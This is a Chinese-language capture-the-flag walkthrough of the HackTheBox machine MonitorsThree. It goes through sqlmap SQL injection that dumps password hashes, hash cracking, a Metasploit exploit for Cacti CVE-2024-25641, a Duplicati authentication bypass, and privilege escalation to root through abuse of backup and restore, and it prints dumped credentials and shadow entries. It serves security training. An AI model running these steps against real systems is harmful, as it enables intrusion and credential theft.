基本信息

端口扫描

22,80,和被过滤的8084:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
$ nmap -sC -sV -Pn 10.10.11.30
Starting Nmap 7.95 ( https://nmap.org ) at 2024-08-26 15:50 CST
Nmap scan report for 10.10.11.30
Host is up (0.098s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE    SERVICE VERSION
22/tcp   open     ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 86:f8:7d:6f:42:91:bb:89:72:91:af:72:f3:01:ff:5b (ECDSA)
|_  256 50:f9:ed:8e:73:64:9e:aa:f6:08:95:14:f0:a6:0d:57 (ED25519)
80/tcp   open     http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://monitorsthree.htb/
8084/tcp filtered websnp
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.73 seconds

80

需要加hosts:

1
10.10.11.30 monitorsthree.htb

网络相关业务介绍:

子域名扫描

子域名可以发现一个cacti:

1
2
3
ffuf -w ~/Tools/dict/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://monitorsthree.htb/" -H 'Host: FUZZ.monitorsthree.htb' -fs 13560

cacti                   [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 98ms]

cacti

添加hosts后访问,Cacti 1.2.26:

MonitorsThree

两边都没开注册,回到主站简单测试可以发现忘记密码处可以枚举用户名(用Repeater的话设置改一下跟随重定向):

sql

另外常规测试可以发现sql注入:

sql注入

那就直接行sqlmap了,同样开启跟随重定向,但注意关闭resend:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
sqlmap -r sql.txt -v 3 --level 3  --technique=B

got a 302 redirect to 'http://monitorsthree.htb/forgot_password.php'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] N

sqlmap -r sql.txt -v 3 --level 3 --technique=B --dbs
available databases [2]:
[*] information_schema
[*] monitorsthree_db


sqlmap -r sql.txt -v 3 --level 3  --technique=B -D monitorsthree_db --tables
Database: monitorsthree_db
[6 tables]
+---------------+
| changelog     |
| customers     |
| invoice_tasks |
| invoices      |
| tasks         |
| users         |
+---------------+

sqlmap -r sql.txt -v 3 --level 3  --technique=B -D monitorsthree_db -T users --columns

sqlmap -r sql.txt -v 3 --level 3  --technique=B -D monitorsthree_db -T users -C username,password --dump

Database: monitorsthree_db
Table: users
[4 entries]
+-----------+----------------------------------+
| username  | password                         |
+-----------+----------------------------------+
| janderson | 1e68b6eb86b45f6d92f8f292428f77ac |
| admin     | 31a181c8372e3afc59dab863430610e8 |
| dthompson | 633b683cc128fe244b00f176c8a950f5 |
| mwatson   | c585d01f2eb3e6e1073e92023088a3dd |
+-----------+----------------------------------+

# admin的hash破解出明文
greencacti2001

cacti

得到的密码可以登录cacti:

CVE-2024-25641

根据cacti版本可以搜到相关漏洞:

直接msf模块一键,打到www-data:

信息

然后常规配置文件中得到数据库连接信息:

1
2
3
4
5
6
7
/var/www/html/cacti/include/config.php

$database_type     = 'mysql';
$database_default  = 'cacti';
$database_hostname = 'localhost';
$database_username = 'cactiuser';
$database_password = 'cactiuser';

使用这个信息去查看数据库,得到新的hash:

1
2
3
4
5
6
7
8
9
10
11
12
mysql -u cactiuser -pcactiuser

MariaDB [(none)]> use cacti
MariaDB [cacti]> select username,password from user_auth;
select username,password from user_auth;
+----------+--------------------------------------------------------------+
| username | password                                                     |
+----------+--------------------------------------------------------------+
| admin    | $2y$10$tjPSsSP6UovL3OTNeam4Oe24TSRuSRRApmqf5vPinSer3mDuyG90G |
| guest    | $2y$10$SO8woUvjSFMr1CDo8O3cz.S6uJoqLaTe6/mvIcUuXzKsATo77nLHu |
| marcus   | $2y$10$Fq8wGXvlM3Le.5LIzmM9weFs9s6W2i1FLg3yrdNGmkIaxo79IBjtK |
+----------+--------------------------------------------------------------+

其中marcus的hash可以破解出密码:

1
2
3
sudo hashcat -m 3200 hash.txt ~/Tools/dict/rockyou.txt

12345678910

user flag

得到的密码就是系统上marcus的密码,但marcus只能密钥ssh登录,所以可以su切过去之后再读私钥方便后续操作:

Duplicati & root flag

基础枚举,发现本地8200端口,转发出来查看:

1
ssh -i marcus_id_rsa marcus@10.10.11.30 -L 8200:127.0.0.1:8200

是一个Duplicati

auth bypass

需要认证信息,我们可以访问到相关数据库文件,具体步骤参考,一步步操作绕过认证:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
-2||server-passphrase|Wb6e855L3sN9LTaCuwPXuautswTIQbekmMAr7BrK2Ho=
-2||server-passphrase-salt|xTfykWV1dATpFZvPhClEJLJzYA5A4L74hX7FK8XmY0I=
-2||server-passphrase-trayicon|85f1c87b-821f-463a-9980-fbced4f2ab54
-2||server-passphrase-trayicon-hash|VnE0XrLTcUUSNnnPu3f27J1ljZqDth3wLIep9tcLPeY=


echo 'Wb6e855L3sN9LTaCuwPXuautswTIQbekmMAr7BrK2Ho=' | base64 -d | xxd -p -c 256

59be9ef39e4bdec37d2d3682bb03d7b9abadb304c841b7a498c02bec1acad87a

# 任意密码登录,第一步getnonce得到的响应
{
  "Status": "OK",
  "Nonce": "vLqa2zmay+qOWddhPloQoheYyL83s4m8zhYlAqC7cjc=",
  "Salt": "xTfykWV1dATpFZvPhClEJLJzYA5A4L74hX7FK8XmY0I="
}

# 生成第二步需要的加密密码
var noncedpwd = CryptoJS.SHA256(CryptoJS.enc.Hex.parse(CryptoJS.enc.Base64.parse("vLqa2zmay+qOWddhPloQoheYyL83s4m8zhYlAqC7cjc=") + "59be9ef39e4bdec37d2d3682bb03d7b9abadb304c841b7a498c02bec1acad87a")).toString(CryptoJS.enc.Base64);

XDqc63oXVXI+z3o5WL4U1Np027f36z092jFsiONF8GA=
# 修改替换,注意url编码

backup

然后就是滥用Duplicati的备份功能

1
新增备份->配置新备份->设置名称,加密选项选择无加密->选择一个备份保存位置,文件夹路径(这里查看文件可以看到source下挂载了根目录,所以可以直接选择/source/tmp作为备份保存位置)->源数据直接设置为/source/root/ ->取消掉自动运行备份->默认选项保存,然后刷新首页看到我们的备份任务,选择立即运行

recovery

备份是以root权限进行的,我们现在还没有权限,接下来选择从备份恢复文件,其中一步可以修改权限:

1
恢复文件,选择我们的备份->直接选择/root/root.txt,继续->选择位置,恢复读写权限->恢复完成后即可去读取文件

写入文件

这种方法直接读了root.txt,同样使用备份恢复可以写公钥到root:

1
/source/tmp/miao1/authorized_keys -> /source/root/.ssh/authorized_keys

恢复完成写入了root的/source/root/.ssh/authorized_keys,即可直接ssh登录:

run-script

还有更简单的方法,Duplicati高级设置里可以设置各种run-script,然后去运行任何任务都会运行scrit执行命令:

shadow

1
2
root:$y$j9T$3TDQ3GS5lSkNwiN4EsxVB/$Jyu3CWLTQ4mIypw/03JOtPle6vdpaoY/x6J9brbV9P4:19869:0:99999:7:::
marcus:$y$j9T$E2hoLeuzugmRkxli4l2tW0$yW1Z2shW601aB1eqvybmrTri2Z6X6l9Wz5IIhK89Dd2:19861:0:99999:7:::

参考资料